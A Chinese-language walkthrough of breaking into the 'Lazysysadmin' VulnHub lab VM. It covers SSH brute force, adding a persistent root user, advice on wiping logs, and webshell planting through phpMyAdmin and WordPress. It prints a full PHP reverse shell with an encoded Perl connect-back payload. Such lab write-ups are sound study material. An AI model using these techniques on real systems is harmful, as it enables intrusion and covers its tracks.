【VulnHub靶機滲透】二：Lazysysadmin

該靶機設定了一些不安全的配置以及弱口令，導致重要文件泄漏。本次通過對發現的端口服務，逐一進行滲透提權測試來學習該靶機，如有問題請指出。

文章較長，記錄了不斷測試並發現利用的過程。

---

簡介

靶機：

• 名稱：Lazysysadmin
• 系統：Linux
• 難度：初級 / 中級
• 目標：
  1.教初學者一些基本的Linux枚舉技巧
  2.讓自己更加熟悉Linux的服務配置，然後創造更多靶機給大家去學習
  3.得到root權限並找到flag

環境：

• 靶機：Lazysysadmin——192,168.11.21
• 攻擊機：Kali——192.168.11.11
• 工具：Nmap、dirb、NetCat（nc）、BurpSuit、Sqlmap、enum4linux 等

流程：

1. 主機發現、端口掃描
2. 逐一服務進行滲透

信息蒐集

打開Lazysysadmin靶機

使用Nmap進行主機發現

nmap -sn 192.168.11.1/24

對其進行端口及操作系統詳細掃描

nmap -sS -Pn -T4 -sV -O 192.168.11.21

再使用-A進行全盤掃描，結果如下

root@kali:~/Desktop# nmap -sS -A -T4 192.168.11.21
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 02:24 EDT
Nmap scan report for 192.168.11.21
Host is up (0.0011s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries 
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info: 
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.168.11.11
|_  error: Closing link: (nmap@192.168.11.11) [Client exited]
MAC Address: 00:0C:29:4A:06:AF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: -1s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2020-03-21T16:24:20+10:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-21T06:24:20
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   1.12 ms 192.168.11.21

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.33 seconds

大致得到目標主機信息如下：

• OS： Linux 3.2 - 4.9（Ubuntu）
• 22端口： ssh——OpenSSH 6.6.1
• 80端口： http——Apache httpd 2.4.7
• 139端口： netbios——Samba smbd 3.x - 4.x
• 445端口： netbios——Samba smbd 4.3.11
• 3306端口： mysql——MySQL
• 6667端口： irc——InspIRCd

OK，對目標端口一個一個來進行測試。

滲透測試

1、22端口：ssh

22端口開啓的是ssh服務，可用於遠程登錄實現文件共享等功能。

使用hydra進行爆破

hydra -L /usr/share/wordlists/uname_passwd/adminUser.txt  -P /usr/share/wordlists/uname_passwd/adminPsd.txt -vV -T 10 192.168.11.21 ssh

選擇賬號密碼字典如下：

很遺憾，未能爆出賬戶，字典不夠強大，先放上吧。。。

後來在Wordpress主頁發現了線索，誒，名字？試一下連接ssh

直接指定用戶名爲togie，重新掃描

hydra -l togie  -P /usr/share/wordlists/uname_passwd/adminPsd.txt -vV -T 10 192.168.11.21 ssh

成功爆出密碼：12345

爆出賬戶之後，使用Xshell進行連接（也可以用Terminal連接），輸入相關信息


ok，成功建立連接

查看一些信息，得知目前不是root權限

查看當前用戶所屬組，有衆多組，包含sudo，可疑

嘗試切換一下，結果直接拿到了root權限，本身就存在root權限？

但是單單這樣不行，我們應該自己創建一個root權限用戶，以保持持久連接。

使用當前管理員權限，創建用戶：abc - abc

添加至root組

usermod -g root abc

這樣該用戶還不是root權限，需要在 /etc/sudoers 文件中用戶權限中添加abc用戶

現在切換並查看abc權限

是root權限，奈斯。使用abc用戶連接目標主機

切換權限至root權限

看一下flag文件

至此基本結束，如果想進一步完善的話，可以進行擦除痕跡，也就是刪除日誌。

比如wtmp用戶連接日誌，存在以下敏感信息

用戶登錄和身份日誌文件：auth.log，以下敏感信息

系統日誌：syslog，敏感信息

在清除痕跡時，可以對系統的所有日誌文件進行排查，刪除敏感日誌信息，此處我就不再演示。

---

附：
Linux常用的日誌文件：

=> /var/log/messages：常規日誌消息
=> /var/log/boot：系統啓動日誌
=> /var/log/debug：調試日誌消息
=> /var/log/auth.log：用戶登錄和身份驗證日誌
=> /var/log/daemon.log：運行squid，ntpd等其他日誌消息到這個文件
=> /var/log/dmesg：Linux內核環緩存日誌
=> /var/log/dpkg.log：所有二進制包日誌都包括程序包安裝和其他信息
=> /var/log/faillog：用戶登錄日誌文件失敗
=> /var/log/kern.log：內核日誌文件
=> /var/log/lpr.log：打印機日誌文件
=> /var/log/mail.：所有郵件服務器消息日誌文件
=> /var/log/mysql.：MySQL服務器日誌文件
=> /var/log/user.log：所有用戶級日誌
=> /var/log/xorg.0.log：X.org日誌文件
=> /var/log/apache2/：Apache Web服務器日誌文件目錄
=> /var/log/lighttpd/：Lighttpd Web服務器日誌文件目錄
=> /var/log/fsck/*：fsck命令日誌
=> /var/log/apport.log：應用程序崩潰報告/日誌文件
=> /var/log/syslog：系統日誌
=> /var/log/ufw：ufw防火牆日誌
=> /var/log/gufw：gufw防火牆日誌

---

OK，22端口基本就是這樣。

2、80端口：http

老套路，先掃描一下Web目錄，將一些重要的有用信息挑選出來：

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: /root/Desktop/res.txt
START_TIME: Sun Mar 22 23:40:24 2020
URL_BASE: http://192.168.11.21/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.11.21/ ----
==> DIRECTORY: http://192.168.11.21/apache/
+ http://192.168.11.21/index.html (CODE:200|SIZE:36072)
+ http://192.168.11.21/info.php (CODE:200|SIZE:77260)
==> DIRECTORY: http://192.168.11.21/javascript/
==> DIRECTORY: http://192.168.11.21/old/
==> DIRECTORY: http://192.168.11.21/phpmyadmin/
+ http://192.168.11.21/robots.txt (CODE:200|SIZE:92)
+ http://192.168.11.21/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.11.21/test/
==> DIRECTORY: http://192.168.11.21/wordpress/
==> DIRECTORY: http://192.168.11.21/wp/

---- Entering directory: http://192.168.11.21/phpmyadmin/ ----
+ http://192.168.11.21/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.11.21/phpmyadmin/index.php (CODE:200|SIZE:8262)
==> DIRECTORY: http://192.168.11.21/phpmyadmin/js/
+ http://192.168.11.21/phpmyadmin/libraries (CODE:403|SIZE:300)
==> DIRECTORY: http://192.168.11.21/phpmyadmin/locale/
+ http://192.168.11.21/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)
+ http://192.168.11.21/phpmyadmin/setup (CODE:401|SIZE:459)
==> DIRECTORY: http://192.168.11.21/phpmyadmin/themes/

---- Entering directory: http://192.168.11.21/wordpress/ ----
+ http://192.168.11.21/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.11.21/wordpress/wp-admin/
==> DIRECTORY: http://192.168.11.21/wordpress/wp-content/
==> DIRECTORY: http://192.168.11.21/wordpress/wp-includes/
+ http://192.168.11.21/wordpress/xmlrpc.php (CODE:405|SIZE:42)


---- Entering directory: http://192.168.11.21/javascript/jquery/ ----
+ http://192.168.11.21/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.11.21/javascript/jquery/version (CODE:200|SIZE:5)

---- Entering directory: http://192.168.11.21/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.11.21/phpmyadmin/js/jquery/

---- Entering directory: http://192.168.11.21/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.11.21/phpmyadmin/themes/original/

---- Entering directory: http://192.168.11.21/wordpress/wp-admin/ ----
+ http://192.168.11.21/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.11.21/wordpress/wp-admin/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.11.21/wordpress/wp-content/ ----
+ http://192.168.11.21/wordpress/wp-content/index.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sun Mar 22 23:43:38 2020
DOWNLOADED: 253660 - FOUND: 22

最重要的基本就是以下幾個：

可以看到網站使用的CMS是Wordpress，還使用了phpmyadmin，可以對這兩個進行後臺弱口令攻擊。

掃描分析完後，查看一下站點頁面

首頁所有東西點擊都無效，查看剛纔掃描出來的robots文件

前三個沒有可用信息，第四個就有點異常了

包含了一個文件名異常的jpg圖片文件，嘗試對文件名base64解密，得到以下字符串，暫時還看不出端倪，先留着

首先測試phpmyadmin，在使用Burp進行爆破無果後，決定使用之前創建的root用戶，查看主機上的配置文件。

phpmyadmin的配置文件 /usr/share/phpmyadmin/libraries/config.default.php，找到user和password：

只有用戶名root，沒有密碼，繼續找相關信息，在/etc/phpmyadmin/config-db.php配置文件中找到了線索

可以看到，文件中提供了一組賬戶名和密碼

最終，使用賬號：root，密碼：TogieMYSQL12345成功進入phpmyadmin，查看所有用戶：

ok，偷偷看一下Wordpress庫的內容，誒？報錯？

查得，好像是phpmyadmin配置文件本身的問題，去改一下試試。

• 找到phpmyadmin的配置文件：config.inc.php

  將下面這一行：
  $cfg['Servers'][$i]['table_uiprefs'] = 'pma_table_uiprefs';

  改爲：
  $cfg['Servers'][$i]['pma__table_uiprefs'] = 'pma__table_uiprefs';

使用service apache2 restart重啓apache服務就可以了。（需要使用root權限操作）

再次進入Wordpress庫，查看user表中的用戶信息：

存在一個網站後臺的Admin用戶（後兩個是測試創建的），但是密碼是加密的，暫且放下。

利用 phpmyadmin 來 getshell，有兩種方式：

1. 利用INTO OUTFILE直接將一句話寫入文件
2. 利用 MySql 的日誌文件 getshell

不論哪種方式，都必須知道網站的根路徑，才能成功連接到木馬文件。

在之前的網站目錄掃描中，有一個 info.php 文件，疑似phpinfo

不出所料，的確是phpinfo，找到了網站根路徑：/var/www/html

OK，開始寫馬。

1、直接寫入文件
利用INTO OUTFILE語句來寫入一句話木馬文件，嘗試想網站根路徑寫入，但是報錯

原因是mysql限制了導出寫入文件的路徑，查看一下路徑配置，果然限制了路徑：

嘗試在指定路徑寫入文件

成功寫入了，那麼試一下是否有路徑解析漏洞

唉，不存在，只能規規矩矩地臨時修改secure_file_priv的值，然後寫入根路徑了。

哎呦，還不能直接修改，那隻能在配置文件中修改了，但是……這不就是爲了得到shell嗎？

所以該方法以失敗告終。

2、通過日誌文件

原理：
phpmyadmin有一個記錄日誌的文件，但是一般情況下會關閉，開啓日誌記錄，然後設置日誌記錄名稱爲.php，隨便執行sql語句，只要包括一句話木馬就會被寫入到日誌中去，然後就可以連接getshell。

ok，開搞，先查看一下日誌記錄是否開啓

不僅關閉，而且也限制了路徑，難搞啊。。還好我們是root權限用戶，哈哈哈，可以進行修改。

先打開日誌記錄功能：

set global general_log = on;

再設置日誌路徑爲Web根路徑：

emmmm，又不可以，那就真沒轍了，關於phpmyadmin的測試就到此爲止，種馬就是以上兩種方式。

然後對Wordpress進行測試：

查看主頁

看一下用戶名：

訪問Wordpress默認的管理員界面：

使用Admin賬戶登錄發現，該用戶的確存在

使用Burp爆破，但是依然沒有爆出密碼，換一種思路，查看主機中的配置文件：/var/www/html/wordpress/wp-config.php

誒，這不就是剛纔看到的帳號嗎？密碼類似phpmyadmin密碼，但是有一點不同

嚯！登進來了，很奈斯

找到一個上傳文件的地方

結果，直接上傳 target.php 木馬文件，被攔截了

使用Burp抓包進行繞過，但是無論是截斷、後綴解析（php2.3.4.5、phps、phtml、pht）都無法繞過，結果在利用插件進行種馬時，插入了phpinfo()函數的語句，導致所有界面都被執行了該語句：

那也就是說這樣是可以的，emmm，重新改回來原來的插件內容吧，找到主機裏的插件文件/var/www/html/wordpress/wp-content/plugins/hello.php，插入的就是下邊的語句：
將其刪除，重新進入後臺，在插件編輯處（添加處無法打開，不然可以直接寫入）插入以下語句

誒，寫着寫着就不行了，難搞啊，不過現在是在後臺，方法就多了，在主題裏重新寫吧，找到一個content.php，寫入一句測試代碼：echo"11111111111111111111111";

訪問一下，ok沒成功執行了

直接插入一句話木馬

用菜刀連接，成功拿到shell

再試一下寫入一個反彈shell：

kali上使用nc監聽8848端口，訪問該頁面就會成功反彈

再使用python創建一個完整的shell環境，切換root用戶

80端口的測試到此爲止。

---

附： php反彈shell完整代碼

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>

---

3、139、445：SMB

SMB協議用於實現局域網的文件和打印機共享，Samba是在Linux和UNIX系統上實現SMB協議的一個免費軟件，由服務器及客戶端程序構成。

常見的用於實現該共享功能的開放端口是139和445端口，一般連接會要求用戶密碼，但某些時候也會允許無密碼連接。

本次就利用samba配置不當，導致無密碼連接時泄漏重要文件，來進行滲透。

首先使用 enum4linux 掃描一下目標主機的Samba信息，得到相關服務以及用戶等信息

• enum4linux介紹：KaliLinux信息收集之enum4linux

enum4linux 192.168.11.21

可以看到，目標主機開啓了ipc共享和磁盤共享


又發現允許無賬戶密碼連接，這就好辦了

在連接目標主機的SMB文件共享服務時，有兩種方式：

• 資源管理器連接
• 命令行連接

1、資源管理器連接：

1）Windows下，打開我的電腦，在地址欄輸入 \\192.168.11.21，提示輸入賬號密碼，即可。


2）Linux下，在資源管理器下的網絡服務中，輸入smb://192.168.11.21 即可。


2、命令行連接：

1）Windows下，通過發現的IPC服務，來建立ipc連接，然後映射磁盤即可。

輸入以下命令：net use \\192.168.11.21\ipc$ "" /user:"a"，此處的用戶名隨意填

然後映射盤符即可。

也可以直接輸入 net use F: \\192.168.11.21\share$ " "/user:"a" 建立磁盤映射：
（此處的share是因爲之前掃描到的目標主機開啓了share 和 print 兩個目錄的磁盤映射）

切換盤符查看一下映射文件

ok

2）Linux下

• 2.1）使用掛載命令：

sudo mount -t cifs //ip地址/path/to/share path/to/mount

該命令解釋：

mount：掛載命令

-t cifs： 用cifs文件系統掛載samba共享文件，如果提示錯誤的文件系統的話，可能是沒有cifs，需要自己安裝。【centos：
yum install nfs-utils】

//ip地址/path/to/share：共享目錄路徑

path/to/mount：要掛載的路徑，需要自己創建一個

掛載共享，提示輸入密碼時，回車即可，因爲服務器允許無密碼訪問

• 2.2）使用 smbclient 連接

使用 smbclient 來鏈接samba服務器，結果如下：

這就是連接SMB服務器的一些方法。

當成功連接到SMB服務器時，查看其共享文件發現存在關鍵文件泄漏問題。

• 在 /share/wordpress/wp-config.php 文件中發現了數據庫賬號密碼，登進了phpmyadmin
  
• 在 /share/deets.txt 文件中發現了一個密碼，連接上了ssh服務
  

除此之外，嘗試向共享磁盤中寫文件，發現無法寫入，因此之後的測試都是基於發現的密碼泄露。

4、3306端口：mysql

嘗試從終端連接mysql，發現未開啓遠程連接，因此無法展開滲透。

所以關於3306的滲透，也就是phpmyadmin的滲透步驟了。

5、6667端口：irc

6667端口運行着irc服務軟件InspIRCd，InspIRCd是一個可擴展的IRC軟件包，可以在Linux、BSD或視窗系統下建立一個運行穩定界面時尚體積小巧的IRC聊天服務器。

使用MSF找到了一個漏洞，但是沒有成功。

該靶機的滲透大致就是這樣。

總結

總結一下滲透該靶機的大致的流程：

• 掃描主機，蒐集端口服務及OS信息
• 利用信息泄漏（my name is togie）及弱口令爆出ssh密碼
• 連接ssh，利用用戶權限配置不當，得到root權限
• 利用root權限查看配置文件，得到phpmyadmin帳號密碼
• 利用root權限，得到用戶信息，登錄Wordpress默認管理後臺
• 在Wordpress中利用文件上傳及插件進行種馬，getshell
• samba文件共享信息泄露，得到之前爆出的賬號密碼

知識點：

• Wordpress默認後臺是 /wp-admin，其中插件功能存在衆多漏洞，可以利用插件掛馬。

• phpmyadmin中掛馬的兩種方式：

  1、into outfile直接寫文件；
  2、利用日誌執行包含木馬的sql語句。

• 做網站滲透時，一定不要忽略robots.txt文件，可能會有意外收穫

• Apache讀文件名是從前到後，因此可以利用name.jpg.php來繞過檢測

• php可解析後綴包括：php2-5、phtml、pht、Php等